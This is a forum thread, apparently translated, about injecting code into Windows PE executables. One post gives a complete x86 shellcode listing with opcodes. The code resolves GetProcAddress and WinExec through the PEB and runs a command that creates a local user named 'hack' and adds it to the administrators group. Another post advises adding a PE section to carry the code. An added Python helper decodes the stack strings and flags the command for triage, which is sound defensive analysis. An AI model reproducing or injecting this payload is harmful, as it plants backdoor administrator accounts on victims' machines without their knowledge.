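Post #2
I think you first need to create a section, then write the code into it, and modify the PE structure.
If you're modifying it in assembly, just insert the code directly.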
Post #3
60 pushad
55 push ebp
83EC 40 sub esp, 40
8BEC mov ebp, esp
55 push ebp
64:A1 30000000 mov eax, dword ptr fs:[30]
8B40 0C mov eax, dword ptr [eax+C]
8B70 1C mov esi, dword ptr [eax+1C]
AD lods dword ptr [esi]
8B78 08 mov edi, dword ptr [eax+8]
8B47 3C mov eax, dword ptr [edi+3C]
8B5407 78 mov edx, dword ptr [edi+eax+78]
03D7 add edx, edi
8B4A 18 mov ecx, dword ptr [edx+18]
8B5A 20 mov ebx, dword ptr [edx+20]
03DF add ebx, edi
@@:
49 dec ecx
8B348B mov esi, dword ptr [ebx+ecx*4]
03F7 add esi, edi
B8 47657450 mov eax, 50746547 ; GetP
3906 cmp dword ptr [esi], eax
75 F1 jnz @B
B8 726F6341 mov eax, 41636F72 ; rocA
3946 04 cmp dword ptr [esi+4], eax
75 E7 jnz @B
8B5A 24 mov ebx, dword ptr [edx+24]
03DF add ebx, edi
66:8B0C4B mov cx, word ptr [ebx+ecx*2]
8B5A 1C mov ebx, dword ptr [edx+1C]
03DF add ebx, edi
8B048B mov eax, dword ptr [ebx+ecx*4]
03C7 add eax, edi
8945 40 mov dword ptr [ebp+40], eax
68 78656300 push 636578 ; xec
68 57696E45 push 456E6957 ; WinE
54 push esp ; WinExec
57 push edi
FF55 40 call dword ptr [ebp+40] ; GetProcAddress
8945 08 mov dword ptr [ebp+8], eax
6A 00 push 0
68 64640000 push 6464 ; dd
68 6B202F61 push 612F206B ; k /a
68 20686163 push 63616820 ; hac
68 746F7273 push 73726F74 ; tors
68 73747261 push 61727473 ; stra
68 6D696E69 push 696E696D ; mini
68 70206164 push 64612070 ; p ad
68 67726F75 push 756F7267 ; grou
68 6F63616C push 6C61636F ; ocal
68 6574206C push 6C207465 ; et l
68 6464266E push 6E266464 ; dd&n
68 6B202F61 push 612F206B ; k /a
68 20667563 push 63756620 ; fuc
68 6861636B push 6B636168 ; hack
68 73657220 push 20726573 ; ser
68 65742075 push 75207465 ; et u
68 2F63206E push 6E20632F ; /c n
68 436D6420 push 20646D43 ; Cmd
54 push esp
; Cmd /c net user hack fuck /add&net localgroup administrators hack /add
FF55 08 call dword ptr [ebp+8] ; WinExec
61 popad
This should be a bit easier to understand.
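
An added example, not part of the original post: a Python triage helper that decodes the strings the listing above assembles on the stack with consecutive PUSH instructions and flags the account-creation command. The bytes are copied from the listing's opcode column; the function names and the regex are assumptions of this example.

```python
import re

# Opcode bytes copied from the listing above: the two PUSH runs plus the
# instructions between them. Assumption: the buffer starts on an instruction
# boundary, so a linear byte scan stands in for a real disassembler.
LISTING_HEX = """
68 78656300 68 57696E45 54 57 FF5540 894508
6A00 68 64640000 68 6B202F61 68 20686163 68 746F7273 68 73747261
68 6D696E69 68 70206164 68 67726F75 68 6F63616C 68 6574206C
68 6464266E 68 6B202F61 68 20667563 68 6861636B 68 73657220
68 65742075 68 2F63206E 68 436D6420 54 FF5508
"""
SAMPLE = bytes.fromhex("".join(LISTING_HEX.split()))

# Local account creation / group membership changes worth flagging in triage.
ACCOUNT_CHANGE = re.compile(r"net\s+(user|localgroup)\b.*?/add", re.I)

def stack_strings(code, min_len=4):
    """Return (offset, text) for printable strings built by runs of PUSH imm."""
    found, i = [], 0
    while i < len(code):
        start, chunks = i, []
        while i < len(code):
            if code[i] == 0x68 and i + 5 <= len(code):    # push imm32
                chunks.append(code[i + 1:i + 5])
                i += 5
            elif code[i] == 0x6A and i + 2 <= len(code):  # push imm8, sign-extended
                fill = b"\xff" if code[i + 1] & 0x80 else b"\x00"
                chunks.append(code[i + 1:i + 2] + fill * 3)
                i += 2
            else:
                break
        if not chunks:
            i += 1
            continue
        # The last push lands at the lowest address, so memory order is reversed.
        for part in b"".join(reversed(chunks)).split(b"\x00"):
            if len(part) >= min_len and all(32 <= c < 127 for c in part):
                found.append((start, part.decode("ascii")))
    return found

def flag_account_changes(code):
    """Return decoded stack strings that look like local account manipulation."""
    return [s for _, s in stack_strings(code) if ACCOUNT_CHANGE.search(s)]

if __name__ == "__main__":
    for offset, text in stack_strings(SAMPLE):
        print(f"{offset:#06x}  {text}")
    print("flagged:", flag_account_changes(SAMPLE))
```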
Post #4
Haha, thanks to the poster above....
Got it.